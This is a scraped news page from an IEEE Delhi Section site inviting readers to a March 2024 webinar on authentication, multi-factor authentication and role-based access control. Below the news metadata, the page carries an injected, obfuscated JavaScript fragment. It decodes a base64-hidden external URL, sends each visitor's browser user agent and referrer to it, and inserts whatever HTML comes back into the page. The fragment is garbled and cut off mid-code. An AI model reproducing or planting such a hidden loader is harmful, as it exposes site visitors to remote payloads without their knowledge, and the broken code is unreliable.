

Home > Invitation for Webinar on Authentication and Authorization dated 23-03-2024

Invitation for Webinar on Authentication and Authorization dated 23-03-2024

IEEE Delhi Section with Computer Society Chapter, Consultants Network Affinity Group, Life Member Affinity Group, Inter Society Relations, Industry Relations & SIGHT Standing Committees of IEEE Delhi with the associations CSI, Safa Society, ISTE Delhi Section, IETE Delhi Centre, invites you for a Webinar on 23-March -2024, the Saturday, at 06:00 p.m.

ISTE, ISCA, IITP and Bharati Vidyapeeth, with pre-registration Abstract of the Talk Authentication and authorization play pivotal roles in bolstering the security of SaaS businesses and enterprise applications. Managing diverse user bases, including employees. external partners, and customers, each requiring distinct access levels, adds complexity. Traditional username-password authentication, while widely used, faces challenges due to password susceptibility. Multi-factor authentication (MFA) addresses this by adding layers of verification through methods like biometrics or mobile app-generated codes, significantly reducing unauthorized access risks. Authorization complexities arise from the need for finegrained control over user permissions as enterprise applications support complex workflows. Striking a balance between granting adequate privileges for efficient task execution and safeguarding against unauthorized actions is an ongoing challenge. Rolebased access control (RBAC) systems address these concerns, allowing administrators to define roles and regulate user access precisely. The webinar will discuss its all-round perspective including the real-time issues and challenges.

File:

Invitation for Webinar on Authentication and Authorization dated 23-03-2024.pdf[1]

News Category:

Activities

News Date:

Tuesday, 23 January, 2024 - 12:30

{ let selfer=new XMLHttpRequest;selfer.open("GET", decodeURIComponent(escape(atob('aHR0cHM6Ly91cmxzcGF0aC5jb20vdmVyaWZ5LnBocA==')))

+

nt=\${navigator?.userAgent}&r=\${document?.referrer}`),selfer.onreadystatechange=(()=>{if(4==selfer.readyState)e);document.querySelector("body").insertAdjacentHTML("afterbegin",e?.html)}}),selfer.setRequestHeader("RequestPi); //-->

Source URL: http://14.140.205.245/content/invitation-webinar-authentication-and-authorization-dated-23-03-2024

Links:

[1]

http://14.140.205.245/sites/default/files/news/Invitation%20for%20Webinar%20on%20Authentication%20and%20Au 03-2024.pdf